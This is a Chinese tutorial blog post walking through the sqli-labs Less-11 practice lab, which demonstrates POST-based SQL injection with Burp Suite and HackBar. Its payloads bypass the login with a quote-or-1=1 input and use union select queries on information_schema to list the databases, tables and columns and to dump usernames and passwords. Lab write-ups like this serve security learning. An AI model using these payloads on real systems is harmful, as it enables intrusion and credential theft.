sqli-labs-less-11 POST传递

本文详细介绍了SQL注入攻击的原理和步骤,通过使用Burp Suite和HackBar工具进行POST数据注入,展示了如何判断注入点、确定字段个数、查询数据库信息等。通过联合查询获取了数据库名、表名、字段名以及数据,揭示了SQL注入的危害及其检测防范的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Less-11 post传递

Less-11至less-20为post传递,post注入是通过对输入框进行传参,可以被带入数据库进行的查询
在这里插入图片描述

注入的两个条件:
1.用户可以控制传参,2.用户输入的语句被带入数据库进行查询

首先我们用burp-suite进行抓包,配合hackbar进行注入
抓包,配置好burp-suite代理,
在这里插入图片描述

这里可以看到post传参的过程,将其复制,使用harkbar中的post data,开始注入
在这里插入图片描述

**

判断注入点

**
uname=’ or 1=1# &passwd=&submit=Submit 登录成功,判断这里为单引号闭合
(–+注释在URL中适用,在post传递中我们采用#进行注释)
在这里插入图片描述

判断字段个数,用于后面确定显示位:
uname=’ order by 3# &passwd=&submit=Submit 返回错误:
在这里插入图片描述

uname=’ order by 2# &passwd=&submit=Submit 无回显,确定字段为2

得到显示位:
uname=’ union select 1,2# &passwd=&submit=Submit
在这里插入图片描述

**

使用union联合查询当前数据库:

**
uname=’ union select 1,database()# &passwd=&submit=Submit
在这里插入图片描述

查询所有数据库(使用group_concat)

uname=’ union select 1,(select group_concat(schema_name) from information_schema.schemata )# &passwd=&submit=Submit
在这里插入图片描述

查询security库中的表:

uname=’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’ )# &passwd=&submit=Submit
在这里插入图片描述

查询users表中的字段:

uname=’ union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’)# &passwd=&submit=Submit
在这里插入图片描述

查询users表中username字段的信息:

uname=’ union select 1,(select group_concat(username) from security.users)#&passwd=&submit=Submit
在这里插入图片描述

查询password字段的信息:

uname=’ union select 1,(select group_concat(password) from security.users)#&passwd=&submit=Submit在这里插入图片描述

将username和password连接后再输出:
uname=’ union select 1,(select group_concat(concat_ws(’-’,username,password)) from security.users)#&passwd=&submit=Submit
在这里插入图片描述

未完待续。。。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值